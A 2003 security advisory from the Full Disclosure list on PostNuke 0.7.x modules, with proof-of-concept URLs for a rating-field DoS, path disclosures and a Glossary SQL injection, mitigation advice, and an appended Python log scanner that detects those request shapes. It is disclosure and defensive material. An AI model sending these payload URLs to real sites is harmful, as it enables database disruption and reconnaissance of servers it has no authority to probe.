Full Disclosure mailing list archives
PostNuke Main Modules SQL Injections , DoS and Path Disclosures
From: "Lorenzo Hernandez Garcia-Hierro" <novappc () novappc com>
Date: Mon, 9 Jun 2003 21:07:56 +0200
------
Product: PostNuke
Vendor: PostNuke WWW.POSTNUKE.COM
Versions Vulnerable:
  PostNuke Phoenix 0.7.x.x
  Phoenix 0.7.2.3 with patches (in all versions)
  Phoenix 0.7.2.3 without patches (in all versions)
  0.7.2.1 (All prior versions of 0.7.2.3 with/without patches)
Not vulnerable: ?
Advisory: NSRG-09-8
------
DESCRIPTION:
------
Researching with my last advisory about PHP-Nuke, I found in PostNuke the same potential DoS attack and buffer overflow in rating-related systems like Web Links, Downloads and all the main modules! I found path disclosures and some SQL injections. Main modules of phpNuke-based portals are again affected by security holes...

--------
FOUND VULNERABLE MODULES:
--------

***********
*DOWNLOADS*
***********
DoS attack in the rating system and path disclosures at all id and related fields:

----
DoS Attack
----
The rating system can be used to mount a severe DoS attack on the database server and webserver. The problem is in the validation of the vote: you can vote with any characters you choose!

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT]

The [RANDOM CONTENT] can be a hundred thousand 9s or similar (whatever you want to send). This generates a new rating value of 2,147,483,647.00, or a random error number generated by the MySQL server.

----
Path Disclosure
----
I encountered some path disclosures in PostNuke in the Downloads and WebLinks modules; you get this path disclosure format:

Fatal error: Call to a member function on a non-object in [LOCAL PATH TO POSTNUKE INSTALLATION]/modules/Downloads/[php vulnerable file] on line xxx

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloadcomments&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloadeditorial&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=brokendownload&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=outsidedownloadsetup&lid=[RANDOM NUMERIC CONTENT]

***********
*WEB_LINKS*
***********
The same as the Downloads module, with the same path disclosures and potential DoS attack. The exploitable URLs of the Downloads vulnerabilities Proof of Concept must be changed to the Web_Links variables for use. The Web Links module is based totally on the Downloads module...

***********
*SECTIONS *
***********
Path disclosures; with the Proof of Concept you get:

Fatal error: Call to a member function on a non-object in [LOCAL PATH TO POSTNUKE INSTALLATION]/modules/Sections/[FILE] on line xxx

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarticles&secid=[BLANK]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarticles&secid=[RANDOM CONTENT]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=[BLANK]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=[RANDOM CONTENT]

***********
*   FAQ   *
***********
Path disclosures related to id fields and FAQs.
You get this error flag:

Fatal error: Cannot redeclare head() (previously declared in /darwing/web/htdocs/beta.linex.org/header.php:44) in /darwing/web/htdocs/beta.linex.org/header.php on line 44

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=`[RANDOM CHARACTERS]

***********
* SEARCH  * - ({ Not totally tested }) -
***********
Path disclosure with a phpBB integration; searching for ` you get a:

Fatal error: Call to a member function on a non-object in [REAL PATH] on line XxX

- Proof of Concept - eXperimental:
Put ` in the search field and click the submit button. Voilà!

***********
* REVIEWS *
***********
Path disclosures:

Fatal error: Call to a member function on a non-object in /home/path to ..... on line XxX

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=`[RANDOM]

***********
* GLOSSARY*
***********
Path disclosures and SQL INJECTION:

Warning: Supplied argument is not a valid MySQL result resource in [REAL PATH TO SCRIPT] on line XxX

- Proof of Concept -
http://[TARGET]/modules.php?op=modload&name=Glossary&file=index&page=`[HERE COMES YOUR RANDOM DATA OR SQL QUERY]

NOTE: The SQL injection doesn't run on all systems.

------------------------
| FINAL NOTES |
------------------------
- The Search module vulnerability is an experimental vulnerability; I haven't found more than one site that runs the combination of phpBB 1.4 and Phoenix 0.7.x.x.
- The PHP error flags must be configured to show the flags in order to view the query results and path disclosures; by default this is on and you can view everything.

------------------------
| SOLUTION |
------------------------
- Configure the error flags in your php.ini to hide the errors and warnings; this protects you from path disclosures.
- Deactivate the affected modules completely if you can't change php.ini.
- Use another PHP portal system. (Typical paranoid/stupid solution ;-)

------------------------
| CONTACT |
------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
-- www.novappc.com --
PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7
**********************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
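As an added defensive example, not part of the advisory or of PostNuke, the following Python scanner runs over constructed Apache access-log lines and flags the request shapes the advisory describes: an addrating call whose rating value is not a small integer, id-style parameters (lid, secid, artid, id_cat, id, ratinglid) that are blank or non-numeric, and any parameter value carrying a backtick or quote as in the FAQ, Reviews and Glossary proofs of concept. The log lines and the two-digit rating limit are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Parameters the advisory shows being hit with blank, non-numeric or
# backtick-laden values across the PostNuke modules it lists.
NUMERIC_ID_PARAMS = {"lid", "secid", "artid", "id_cat", "id", "ratinglid"}
SQL_META = set("`'\"")
MAX_RATING_DIGITS = 2  # assumption: a legitimate vote is at most two digits

# Constructed Apache combined-log lines (not real traffic) mixing normal
# requests with the shapes the advisory's proofs of concept produce.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2003:21:07:56 +0200] "GET /modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=12&rating=7 HTTP/1.0" 200 512
10.0.0.6 - - [09/Jun/2003:21:08:01 +0200] "GET /modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=12&rating=99999999999999999999 HTTP/1.0" 200 512
10.0.0.7 - - [09/Jun/2003:21:08:05 +0200] "GET /modules.php?op=modload&name=Sections&file=index&req=listarticles&secid= HTTP/1.0" 200 1024
10.0.0.8 - - [09/Jun/2003:21:08:09 +0200] "GET /modules.php?op=modload&name=Glossary&file=index&page=%60abc HTTP/1.0" 200 1024
10.0.0.9 - - [09/Jun/2003:21:08:12 +0200] "GET /modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=42 HTTP/1.0" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(request_path):
    """Return (param, reason) findings for one request URI, [] if it looks benign."""
    findings = []
    query = parse_qs(urlparse(request_path).query, keep_blank_values=True)
    for param, values in query.items():
        for value in values:
            if any(ch in SQL_META for ch in value):
                findings.append((param, "SQL metacharacter in value"))
            elif param == "rating" and (not value.isdigit() or len(value) > MAX_RATING_DIGITS):
                findings.append((param, "rating is not a small integer"))
            elif param in NUMERIC_ID_PARAMS and not value.isdigit():
                findings.append((param, "blank or non-numeric id"))
    return findings


def scan_log(text):
    """Return [(client_ip, findings)] for every log line with at least one finding."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = suspicious_params(match.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, findings)
```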